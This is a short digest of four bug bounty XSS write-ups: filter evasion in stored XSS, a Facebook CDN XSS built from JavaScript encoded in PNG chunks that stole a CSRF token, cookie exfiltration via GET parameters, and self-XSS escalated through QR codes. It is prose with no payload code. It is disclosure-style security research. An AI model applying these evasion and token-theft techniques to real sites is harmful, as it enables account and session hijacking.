A bug bounty hunter describes finding 5 stored XSS vulnerabilities on a private program worth $1,016.66 each, including techniques for bypassing input filters through payload placement, encoding variations (<), file upload abuse (.xhtml), and filter evasion by targeting unsanitized HTML in notifications.
A critical XSS vulnerability on Facebook's CDN was achieved by encoding malicious JavaScript into PNG IDAT chunks, uploading the image as an advertisement, then serving it with an .html extension to trigger HTML interpretation via MIME sniffing. The attacker leveraged document.domain to access the fb_dtsg CSRF token from www.facebook.com and bypass LinkShim protections.
A researcher discovered a cookie-based XSS vulnerability that became exploitable by moving the vulnerable cookie parameter into URL GET parameters, allowing them to exfiltrate session cookies without needing to chain additional vulnerabilities like CRLF injection.
A bug bounty researcher discovered a technique to escalate a self-XSS vulnerability into a reflected XSS by encoding the malicious payload as a QR code, which bypassed client-side filtering and allowed automatic payload execution when scanned by victims without additional user interaction.